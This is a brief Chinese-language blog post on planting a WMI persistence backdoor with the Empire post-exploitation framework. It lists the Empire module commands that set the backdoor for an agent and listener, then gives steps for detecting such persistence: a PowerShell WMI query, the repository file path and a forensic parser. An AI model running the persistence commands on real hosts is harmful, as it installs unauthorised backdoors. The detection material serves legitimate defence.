前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Empire-WMI型后门

Empire-WMI型后门

原创
作者头像
浪子云
修改2022-09-13 09:41:06
6190
修改2022-09-13 09:41:06
举报
文章被收录于专栏:子云笔记子云笔记
代码语言:javascript
复制
usemodule powershell/persistence/elevated/wmi
set Agent 91AT5M4V
set Listener test
execute


检查目标主机的情况
powershell:Get-WmiObject -Namespace root\subscription -class commandlineeventconsumer


https://github.com/davidpany/WMI_Forensics.git
WMI 存储库:%windir%\System32\Wbem\Repository---->OBJECTS.DATA

python2 PyWMIPersistenceFinder.py OBJECTS.DATA

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档